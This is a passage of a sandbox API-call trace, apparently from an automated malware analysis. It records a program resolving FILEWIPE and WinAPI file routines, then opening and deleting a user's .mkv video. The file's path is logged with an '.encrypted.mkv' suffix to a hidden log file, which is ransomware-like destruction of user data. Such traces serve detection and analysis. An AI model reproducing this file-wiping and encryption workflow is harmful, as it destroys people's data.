hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0043.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.514] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.514] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.514] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.531] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.531] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0043.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0043.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.531] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.531] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.531] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde2eb040, ftCreationTime.dwHighDateTime=0x1d5be3a, ftLastAccessTime.dwLowDateTime=0xc1a9ae40, ftLastAccessTime.dwHighDateTime=0x1d5bcd0, ftLastWriteTime.dwLowDateTime=0xc1a9ae40, ftLastWriteTime.dwHighDateTime=0x1d5bcd0, nFileSizeHigh=0x0, nFileSizeLow=0x79a3, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Dzrcf9Vo2bS-.mkv", cAlternateFileName="DZRCF9~1.MKV")) returned 0x7c2240 [0043.531] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0043.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.531] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.531] CharLowerBuffW (in: lpsz="byte[31139]", cchLength=0xb | out: lpsz="byte[31139]") returned 0xb [0043.532] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.532] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0043.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.532] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.532] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0043.532] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0043.532] FreeLibrary (hLibModule=0x76b40000) returned 1 [0043.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0043.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0043.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0043.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0043.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0043.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0043.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0043.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0043.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0043.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0043.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.533] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.533] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.533] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.533] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0043.533] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.533] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.533] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.533] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.533] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.533] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.533] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.533] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.534] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0043.534] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.534] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\dzrcf9vo2bs-.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0043.534] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.534] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.534] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0043.535] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.535] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.535] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.535] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.535] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.535] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.535] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.535] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.535] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0043.535] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.535] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.535] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.535] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.535] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.536] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.536] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv", lpFilePart=0x0) returned 0x49 [0043.536] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde2eb040, ftCreationTime.dwHighDateTime=0x1d5be3a, ftLastAccessTime.dwLowDateTime=0xc1a9ae40, ftLastAccessTime.dwHighDateTime=0x1d5bcd0, ftLastWriteTime.dwLowDateTime=0x19a8a220, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x79a3, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Dzrcf9Vo2bS-.mkv", cAlternateFileName="DZRCF9~1.MKV")) returned 0x7c2240 [0043.536] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\dzrcf9vo2bs-.mkv")) returned 1 [0043.538] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde2eb040, ftCreationTime.dwHighDateTime=0x1d5be3a, ftLastAccessTime.dwLowDateTime=0xc1a9ae40, ftLastAccessTime.dwHighDateTime=0x1d5bcd0, ftLastWriteTime.dwLowDateTime=0x19a8a220, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x79a3, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Dzrcf9Vo2bS-.mkv", cAlternateFileName="DZRCF9~1.MKV")) returned 0 [0043.538] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.538] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.540] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0043.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0043.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0043.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.540] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.540] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0043.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.541] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0043.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.541] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0043.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0043.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.541] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.541] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.541] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.542] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.542] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0043.542] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.542] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.542] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0043.543] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x3824, lpOverlapped=0x0) returned 1 [0043.543] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0043.543] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x3824, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.543] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.encrypted.mkv\r\n", cchWideChar=86, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 86 [0043.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x56) returned 0x794b90 [0043.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.encrypted.mkv\r\n", cchWideChar=86, lpMultiByteStr=0x794b90, cbMultiByte=86, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.encrypted.mkv\r\n", lpUsedDefaultChar=0x0) returned 86 [0043.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0043.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0043.544] WriteFile (in: hFile=0x128, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x55, lpOverlapped=0x0) returned 1 [0043.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0043.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.544] CloseHandle (hObject=0x128) returned 1 [0043.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0043.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0043.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.553] HeapFree (in: hHeap=0x770000, 